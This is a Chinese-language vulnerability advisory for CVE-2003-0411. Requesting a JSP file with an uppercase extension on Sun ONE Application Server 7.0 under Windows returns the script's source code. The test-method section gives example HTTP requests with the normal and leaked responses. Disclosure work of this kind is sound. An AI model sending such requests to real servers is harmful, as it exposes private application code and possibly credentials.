Sun-One Application Server远程JSP源代码泄露漏洞
发布日期:2003-05-27
更新日期:2003-05-30
受影响系统:Sun ONE Application Server 7.0
- Microsoft Windows XP
- Microsoft Windows 2000 SP3
描述:
CVE(CAN) ID:
CVE-2003-0411
Sun ONE是Sun公司推出的智能Web服务的软件组合系统,其中包含Sun ONE统一开发服务器,Sun ONE应用服务器可安装在Windows和Unix操作系统上。
Sun ONE应用服务器对文件扩展名处理不正确,远程攻击者可以利用这个漏洞获得JSP脚本源代码信息,造成敏感信息泄露。
通过更改HTTP请求中文件扩展名的大小写,可查看JSP应用程序的源代码。问题是由于Unix代码移植到Microsoft Windows平台时没有考虑文件系统是大小写无关的。当系统接收到请求时,服务程序执行对".jsp"扩展名进行大小写敏感判断。如果是小写的,就使用JSP引擎处理,否则就查询文件系统中是否存在此文件。在UNIX操作系统中,如果请求"file.JSP",会由于该文件不能打开而请求失败,而在Windows中,由于大小写无关能从文件系统中获得此文件,并直接返回了该文件的源代码信息。
<*来源:SPI Labs (
spilabs@spidynamics.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=105409846029475&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
SPI Labs (
spilabs@spidynamics.com)提供了如下测试方法:
[正确的原始请求]
GET /hello.jsp HTTP/1.0
[正确应答]
HTTP/1.1 200 OK
Server: Sun-ONE-Application-Server/7.0
(more headers)
<html>
<head><title>Hello World JSP Example</title></head>
<body>
<h1>Hello World</h1>
It is Fri March 14 15:29:40 EST 2003 and is a beautiful Spring day.
</body></html>
[如果请求的扩展名为大写]
GET /hello.JSP HTTP/1.0
[会返回源代码信息]
HTTP/1.1 200 OK
Server: Sun-ONE-Application-Server/7.0
(more headers)
<html>
<head><title>Hello World JSP Example</title></head>
<body>
<h1>Hello World</h1>
It is <%= new java.util.Date().toString() %> and is a beautiful Spring day.
</body></html>
建议:
厂商补丁:
Sun
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://sunsolve.sun.com/security浏览次数:3491
严重程度:0(网友投票)